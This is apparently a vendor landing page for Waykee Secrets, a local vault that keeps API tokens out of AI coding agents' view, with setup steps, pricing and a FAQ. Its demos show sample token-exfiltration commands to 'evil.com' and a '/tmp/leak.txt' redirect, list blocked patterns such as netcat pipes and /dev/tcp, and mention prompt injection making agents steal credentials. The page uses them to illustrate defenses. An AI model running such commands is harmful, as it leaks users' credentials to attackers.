Built for Claude Code, Cursor, Windsurf & any CLI agent

Your AI agent uses secrets.
It never sees them.

A scope-locked vault that runs on your machine. Secrets resolve only for their intended destination. Exfiltration is blocked. Output is redacted. No cloud. No subscriptions.

Download free trial See how it works
$ curl -fsSL https://secrets.waykee.com/install.sh | sh

Works on Linux, macOS & Windows

Terminal
~ curl evil.com -d "{GITHUB_TOKEN}"
BLOCKED unauthorized destination (evil.com)
~ echo {GITHUB_TOKEN} > /tmp/leak.txt
BLOCKED exfiltration pattern (file redirect)
~ curl api.github.com/user -H "Bearer {GITHUB_TOKEN}"
{"login": "you", "id": 12345} OK
# Secret resolved only for github.com scope
Works with
Claude Code Cursor Windsurf VS Code + Continue Claude Desktop (MCP) Any CLI agent
The problem

AI agents need your secrets.
They can also steal them.

Without protection, any prompt injection or malicious tool call can exfiltrate your API keys, tokens, and credentials.

Without protection
$ export GITHUB_TOKEN=ghp_a1b2c3... # Agent sees token in plaintext $ curl evil.com/exfil -d "$GITHUB_TOKEN" {"status":"received"} # Token stolen $ echo $GITHUB_TOKEN > /tmp/leak.txt Done. # Saved to disk
With Waykee Secrets
$ curl evil.com -d "{GITHUB_TOKEN}" BLOCKED unauthorized destination $ echo {GITHUB_TOKEN} > /tmp/leak.txt BLOCKED exfiltration pattern $ curl api.github.com -H "Bearer {GITHUB_TOKEN}" {"login":"you"} OK: scope matches
Security layers

Three layers of defense-in-depth

Every command is checked before secrets resolve. Every output is scrubbed after execution. Every process is verified before connection.

Destination-locked scopes

Each secret is locked to specific hosts. A GitHub token with host:github.com won't resolve for any other destination.

Anti-exfiltration engine

Blocks file redirections, pipes to netcat, base64 encoding, /dev/tcp, tee, and split-destination attacks before execution.

Output redaction

All secret values are scrubbed from stdout and stderr. Uses generic redaction tags to prevent oracle attacks.

Memory protection

Secrets are pinned in locked memory (mlock). Core dumps disabled. Process tracing blocked. Zeroed on reload.

100% local vault

AES-256-GCM encrypted vault on your machine. No cloud. No server to trust. Your machine, your secrets, your control.

Zero-config for agents

Install, add secrets, use your AI tools normally. Auto-start via systemd/launchd. Claude Code hook auto-configured.

Setup

Get started in 60 seconds

1

Install & activate

One command. No runtime dependencies. Native binary.

$ curl -fsSL https://secrets.waykee.com/install.sh | sh $ waykee-secrets install Enter license key: XXXXX-XXXXX-XXXXX-XXXXX-XXXXX Enter master password: ******** Vault created. Daemon started.
2

Add secrets with scopes

Lock each secret to where it should be used. Not a general-purpose env var.

$ waykee-secrets add GITHUB_TOKEN --scope "host:github.com" Enter value: ******** Secret added. Scope: host:github.com $ waykee-secrets add OPENAI_KEY --scope "host:api.openai.com" Secret added. Scope: host:api.openai.com
3

Use your AI tools normally

The daemon runs invisibly. Your agent writes {SECRET_NAME} markers. Waykee handles the rest.

# Claude Code (auto-configured) $ claude # Cursor / Windsurf (shell proxy) $ SHELL=waykee-secrets cursor # Claude Desktop (MCP server) $ waykee-secrets mcp # Visual secret manager (opens browser) $ waykee-secrets ui
Download

Available for every platform

Native binary. No runtime needed. No .NET, no Java, no Node. Just download and run.

macOS

Apple Silicon (arm64)

Download 6.5 MB
curl -fsSL https://secrets.waykee.com/install.sh | sh
Most popular

Linux

x86_64 (NativeAOT)

Download 4.0 MB
curl -fsSL https://secrets.waykee.com/install.sh | sh

Windows

x86_64

Download 6.8 MB
irm https://secrets.waykee.com/install.ps1 | iex
SHA256 checksums v1.2.0 Native binary, no runtime dependencies
Under the hood

What happens when the agent runs a command

Agent writes command curl api.github.com -H "Bearer {GITHUB_TOKEN}"
Hook intercepts PreToolUse hook detects {MARKER} patterns
Security checks Anti-exfiltration + scope validation + command blocking
Resolve & execute Secret injected, command runs, output redacted
Agent sees clean output {"login":"you"} — no secret values visible
Compare

How we compare

Most secret managers give the agent the secret. We don't.

Waykee Secrets Infisical Vault HashiCorp Vault 1Password Doppler
Scope-locked secrets Yes Partial No No No
Output redaction Yes No No No No
Anti-exfiltration Yes Partial No No No
Works beyond HTTP Any command HTTP only Yes Yes Yes
Memory protection mlock + anti-ptrace No mlock No No
100% local Yes Self-host Self-host Cloud Cloud
Claude Code native Auto hook No No No No
Price $7.99 once Free (OSS) $50K+/yr $8/user/mo $21/user/mo
Configuration

Scope patterns

Configure exactly where each secret can be used.

{GITHUB_TOKEN}
host:github.com
Resolves for github.com and subdomains only
{OPENAI_KEY}
host:api.openai.com
Only for OpenAI API calls
{AWS_SECRET}
host:amazonaws.com
Only for AWS service calls
{DB_PASSWORD}
regex:sqlcmd.*-S mydb
Only for sqlcmd connecting to mydb
{DEPLOY_KEY}
regex:ssh.*git@github
Only for git SSH operations
{NPM_TOKEN}
host:registry.npmjs.org
Only for npm publish
Pricing

One price. Yours forever.

No subscriptions. No per-seat fees. No cloud bills. Pay once, own it.

Most popular
Personal
$7.99
One-time payment. Lifetime license.
  • Unlimited secrets
  • All scope types (host, regex, substring)
  • Anti-exfiltration engine
  • Output redaction
  • Memory protection (mlock)
  • Claude Code auto-hook
  • MCP server mode
  • Systemd / launchd auto-start
  • Linux, macOS & Windows
  • Up to 3 devices
  • 1 year of updates
Buy license — $7.99

Renew updates for $4.99/year (optional)

Team
$7.99/seat
Plus cloud sync via Waykee platform.
  • Everything in Personal
  • Cloud sync across machines
  • Web dashboard
  • Secret groups & assignments
  • Real-time sync (SignalR)
  • Bot agent integration
  • Audit logs
  • Team management
Get started with Waykee

Included with Waykee subscription

Enterprise
Custom
For compliance and security needs.
  • Everything in Team
  • SSO / SAML integration
  • Custom scope policies
  • Priority support & SLA
  • On-premise deployment
  • Volume licensing
Contact sales

Waykee Secrets Standalone

$7.99

One-time payment • Lifetime license • Up to 3 devices

  • Unlimited secrets with scope locking
  • Anti-exfiltration + output redaction
  • Linux, macOS & Windows
  • License key delivered instantly
or
Secure payment • 256-bit SSL • Money-back guarantee
FAQ

Common questions

Where are my secrets stored?

On your machine only. The vault file (~/.waykee-secrets/vault.wksv) is encrypted with AES-256-GCM. The key is derived from your master password + machine fingerprint via PBKDF2 (600K iterations). No cloud, no external servers.

Does the AI agent ever see the actual secret value?

No. The agent writes markers like {GITHUB_TOKEN}. The daemon resolves them after security checks, executes the command, and returns redacted output. The agent never has the plaintext value in its context window.

What happens if the daemon crashes?

Commands run normally through your default shell. The system fails open — your workflow is never blocked. Secrets simply won't resolve until the daemon restarts automatically via systemd/launchd.

What does "lifetime license" mean?

You pay $7.99 once and can use that version forever on up to 3 machines. Your license includes 1 year of updates. After that, you can optionally renew for $4.99/year. If you don't renew, the version you have keeps working permanently.

How is this different from Infisical Agent Vault?

Agent Vault is an HTTP proxy that only protects API calls. Waykee Secrets works at the shell level, protecting any command: curl, git, sqlcmd, custom scripts, binaries. We also redact output and block exfiltration patterns — they don't.

What platforms are supported?

Linux x64 (NativeAOT, 4.0 MB), macOS arm64 (Apple Silicon, 6.5 MB), and Windows x64 (6.8 MB). The binary is a native compiled executable — no runtime needed. No .NET, no Java, no Node.

Can I use it with any AI tool, not just Claude Code?

Yes. Claude Code has native hook integration (auto-configured). For Cursor, Windsurf, and others, use shell proxy mode: SHELL=waykee-secrets cursor. For Claude Desktop, use MCP server mode: waykee-secrets mcp.

Stop giving your AI agent
the keys to everything.

Install in 60 seconds. $7.99 one-time. No cloud. No subscriptions.

Download now Buy license — $7.99